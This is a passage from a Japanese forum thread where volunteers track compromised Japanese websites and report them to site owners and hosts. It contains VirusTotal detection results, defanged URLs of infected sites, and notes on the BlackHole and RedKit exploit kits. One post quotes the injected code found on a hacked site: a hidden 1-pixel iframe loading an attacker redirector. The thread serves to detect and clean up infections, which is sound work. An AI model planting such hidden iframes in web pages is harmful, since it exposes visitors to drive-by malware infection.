File type: HTML
Detection ratio: 1 / 46
Analysis date: 2013-05-11 18:18:17 UTC
Antivirus Result Update
Norman BlacoleRef.BA 20130511
んで、飛び先のひとつ
File type: HTML
Detection ratio: 6 / 46
Analysis date: 2013-05-11 18:39:21 UTC
Antivirus Result Update
BitDefender Trojan.Html.Fakealert.P 20130511
Emsisoft Trojan.Html.Fakealert.P (B) 20130511
F-Secure Trojan.Html.Fakealert.P 20130511
GData Trojan.Html.Fakealert.P 20130511
MicroWorld-eScan Trojan.Html.Fakealert.P 20130511
nProtect Trojan.Html.Fakealert.P 20130510
ESETもどきに連れてかれたん
- 72 :
- apple-hikkoshi●co●jp/
403、404が改竄されとるんw
ishigo●sytes●net
※電凸済み
- 73 :
- >>72 コード
<!-- . --><iframe width="1px" height="1px" src="http://ishigo●sytes●net/openstat/appropriate/promise-ourselves●php" style="display:block;" ></iframe><!-- . -->
- 74 :
- >>72
修正を確認すた…
- 75 :
- お疲れ様です。
某公益社団法人のサイトがやられていますた。>BlackHole Exploit Kit
おしんにめる済み
- 76 :
- kusuo-o●net
ど う し て こ う な っ た ?
c o m m o n / j s / s c r i p t . j s
- 77 :
- gakunavi●net
- 78 :
- >>76-77
どーん
>76
>>75と同じBlackHole Exploit Kit Redirector
ユーザーへのメールは届かなかったみたい。
toやccが多いと不通になるようです。。。
>77
2013-05-07 08:28:11 UTC (日本時間 : 2013/5/07 17:28:11)にはVirusTotalに投げられてますた。
あきた寝る
- 79 :
- >>78
乙カレー丼
>>76はミンスのHPに投げてみた
- 80 :
- 210●148●117●65/
色々な意味でスゲェw
- 81 :
- >>76 の件
ミンスから返信
・鯖業者と相談して対応
・JPCERTにはミンス(党本部)から連絡済
とのこと。
kusuo-o●net
>ただいまメンテナンス中です。
>後日公開させていただきます。
見に行ったらメンテ中だた...
- 82 :
- >>80
逆引きもぁぅぁぅぁー
きゅう電工のWebフォームは漏れのメアドをスパム認定。。。orz......
上流のIIJにつーほー
>>81
他のページやjsは生きてるお フミダイかも
再要請すた。
- 83 :
- > 再要請
さくらにつーほ >>6
- 84 :
- >>82 >>76
アーッ orz
- 85 :
- コテ忘れるし、sageてないし… orz
- 86 :
- >>76
さくら対応
>>80
御本人様から対応のお返事頂きました
以上確認しました。
皆様お疲れ様です。 m(_ _)m
- 87 :
- BlackHole Exploit Kit Redirector
検体2通、いくつか宛先不通になってた
1通目は、薬物(Viagra等)販売サイトのドメインがあったので
同じとこ逝く2通目アドレス伏せたけど、中間スクリプトのドメインがNGだったもより orz...........
薬物販売サイトにも罠があるっぽい
File size:[TAB]50.3 KB ( 51517 bytes )
File type:[TAB]HTML
Detection ratio:[TAB] 2 / 47
Analysis date:[TAB] 2013-05-22 16:21:42 UTC
Antivirus [TAB] Result [TAB] Update
Avast [TAB] HTML:Script-inf [TAB] 20130522
GData [TAB] HTML:Script-inf [TAB] 20130522
- 88 :
- JaneViewの設定だお>[TAB]
>87やりなおし
File size: 50.3 KB ( 51517 bytes )
File name: pl.txt
File type: HTML
Detection ratio: 2 / 47
Analysis date: 2013-05-22 16:21:42 UTC
Antivirus Result Update
Avast HTML:Script-inf 20130522
GData HTML:Script-inf 20130522
んで感染サイトのスクリプトは
File size: 8.4 KB ( 8624 bytes )
File name: index.html
File type: HTML
Detection ratio: 4 / 47
Analysis date: 2013-05-22 15:50:35 UTC
Antivirus Result Update
Fortinet JS/Iframe.DDG!tr.dldr 20130522
Kaspersky Trojan-Downloader.JS.Iframe.ddr 20130522
McAfee JS/Exploit-Blacole.ht 20130522
NANO-Antivirus Trojan.Script.Expack.bqgmvl
中間スクリプト
File size: 241 bytes ( 241 bytes )
File type: HTML
Detection ratio: 2 / 47
Analysis date: 2013-05-22 16:12:15 UTC
Antivirus Result Update
McAfee Exploit-Rekit.f 20130522
Sophos Troj/ExpJS-II 20130522
- 89 :
- ァッー
追っかけてたら、辿り付いた
http://www.google.com/safebrowsing/diagnostic?site=ime.nu
クッションサイトだからかな
- 90 :
- RedKit Exploit Kit Redirector
ランダムな中間スクリプト
File type: HTML
Detection ratio: 3 / 47
Analysis date: 2013-05-26 14:39:38 UTC
McAfee JS/Exploit-Blacole.lt 20130526
McAfee-GW-Edition JS/Exploit-Blacole.lt 20130526
Sophos Troj/ExpJS-II 20130522
まかひとそふぉぉぉぉすががむばってるん
相変わらずこちらの環境ではブツ落とせないままぽ
- 91 :
- memo
g01pack exploit kit
エフセキュアブログ : g01pack
http://blog.f-secure.jp/tag/g01pack
- 92 :
- >>91
現在の最新情報
エフセキュアブログ : g01packがシェア拡大の兆し
http://blog.f-secure.jp/archives/50701223.html
- 93 :
- www●muse●dti●ne●jp/~ohyes/
- 94 :
- >>93
お疲れ様です。
夢列車につーほーしますた。
- 95 :
- まだ直ってないようですが、
恐らくひげおぢさんがピコーンしたら対応されるかも>93
んで関連
2689367b205c16ce32ed4200942b8b8b1e262dfc70d9bc9fbc77c49699a4f1df/analysis/1166513002/
コメントしてる人やベンダーを責められないと思ふ
ひょっとして>>15なぬかようか
- 96 :
- >>95
MD5: 444bcb3a3fcf8389296c49467f27e1d6
http://docs.google.com/viewer?url=http%3A%2F%2Fwww%2Ejaipa%2Eor%2Ejp%2Fevent%2Foki%5Fict2011%2F111215%5Fmicrosoft%5Fhan%2Epdf
- 97 :
- www●trajal●net/k-b●html
www●f-airline●com/
lukes-world●co●jp/
www2●patt●gr●jp/~ryo/
- 98 :
- 松浦とみよし 市議会議員
www4●ocn●ne●jp/~tomiyosi/
連絡したのにこの状態。。。
- 99 :
- >>97-98
お疲れ様です。
つーほーしました。
以前にもつーほーしたのがあったやうな
つーほー漏れかなん。。。orz...........
- 100 :
- 申告しても対処しないサイト
www●yanagita-kk●co●jp/
www10●ocn●ne●jp/~kuushuu/ussbsindex●html
www●arpak-cdc●co●jp/
w01●tp1●jp/~a541677231/
nanaplan●jp/kako_kenngakusai●html
ir06●com/
www●garage-yamato●com/
www●fp-kazuna●com/insu/
www1●hinocatv●ne●jp/baba/
harakirievent●toypark●in/
100〜のスレッドの続きを読む
hehehe-ハッカージャパンってどうよ-hehehe
【ネットバンク用】Trusteer Rapport【IBM】
【総合】サンドボックス 砂箱 sandbox
フリーのアンチウイルスソフト Part30
ウイルスバスタークラウド 総合 Part15
【アビラ】Avira Antivirus ver.19
avast!Anti-Virus Part196
●不正PROXY? 2chポートチェックサーバ最新情報
listen 【security news】
【ぱよぱよ】F-Secure総合 Part35【ちーん】
--------------------
【自ら荒らして】宇部の正体は「自治厨」だった!4【大騒ぎ】
東武伊勢崎・日光線/東京メトロ日比谷・半蔵門線[IP] 138
【猫プレッソ】ネスプレッソ★13カプセル目【ウンコブリブリ】
【幸福科学】日本維新の会217【清水富美加】
賢者の石と、その応用
【Gwent】グウェントウィッチャーカードゲーム 81
タン塩(゚Д゚)ウマー
舞台「アイ★チュウザ・ステージ」
東京のたこ焼き>>大阪のたこ焼き
【社会】「70歳超えても働く」60代の54%
CEATEC JAPAN写真撮影板part4
BookLive!ユーザースレ2
本郷奏多 part34
実プレイ不要論3【実playだけがTRPGの全てに非ず】
海外ヘルメット17
【顔に心臓】工藤静香のチャチャッとシャシャるドヤ糞ガサツ飯 ★57オタマ 【泥沼の蓮】
【医療】失明状態の女性が視力回復 大阪大がiPS細胞角膜移植 ★3
ホビスタ
☆高橋光臣スレッド★part28
孔子平和賞>ノーベル賞(アメリカ・イスラエル賞)
TOP カテ一覧 スレ一覧 100〜終まで 2ch元 削除依頼
